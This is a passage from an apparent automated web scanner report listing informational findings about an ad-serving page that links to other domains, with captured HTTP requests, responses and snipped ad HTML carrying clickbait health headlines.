<a onclick="javascript:trackClick(17, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=17&b=26&p=1%2C17%2C125&t=11">Shocking Discovery by Boston Researchers for Amazing Joint Relief... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=1%2C17%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=1%2C17%2C125&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=1%2C17%2C125&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...

19.68. http://serve.directdigitalllc.com/serve.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/serve.php

Issue detail

The page was loaded from a URL containing a query string:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=

The response contains the following links to other domains:

http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/58k58g8oxm.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=85%2C104%2C125&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C104%2C125&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C104%2C125&t=11

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341697956&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:41:41 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9405

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C104%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C104%2C125&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C104%2C125&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=85%2C104%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/58k58g8oxm.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=85%2C104%2C125&t=11">1 Secret To Joint Relief</a></span>
<a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=85%2C104%2C125&t=11">This ridiculously easy way to relieve joints will leave you amazed... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C104%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C104%2C125&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=64844327=_4e663f35,8102325438,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=64844327/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C104%2C125&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...

19.69. http://serve.directdigitalllc.com/serve.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/serve.php

Issue detail

The page was loaded from a URL containing a query string:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=

The response contains the following links to other domains:

http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/58k58g8oxm.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C85%2C104&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C85%2C104&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=125%2C85%2C104&t=11

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342314330&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:51:56 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9405

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C85%2C104&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C85%2C104&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C85%2C104&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=125%2C85%2C104&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=125%2C85%2C104&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=125%2C85%2C104&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C85%2C104&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/58k58g8oxm.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C85%2C104&t=11">1 Secret To Joint Relief</a></span>
<a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C85%2C104&t=11">This ridiculously easy way to relieve joints will leave you amazed... <br />
...[SNIP]...

19.70. http://serve.directdigitalllc.com/serve.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/serve.php

Issue detail

The page was loaded from a URL containing a query string:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=

The response contains the following links to other domains:

http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/803znrzpc6.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=85%2C125%2C1&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C125%2C1&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C125%2C1&t=11

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315343244277&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 16:07:27 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9372

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C125%2C1&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C125%2C1&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C125%2C1&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C125%2C1&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
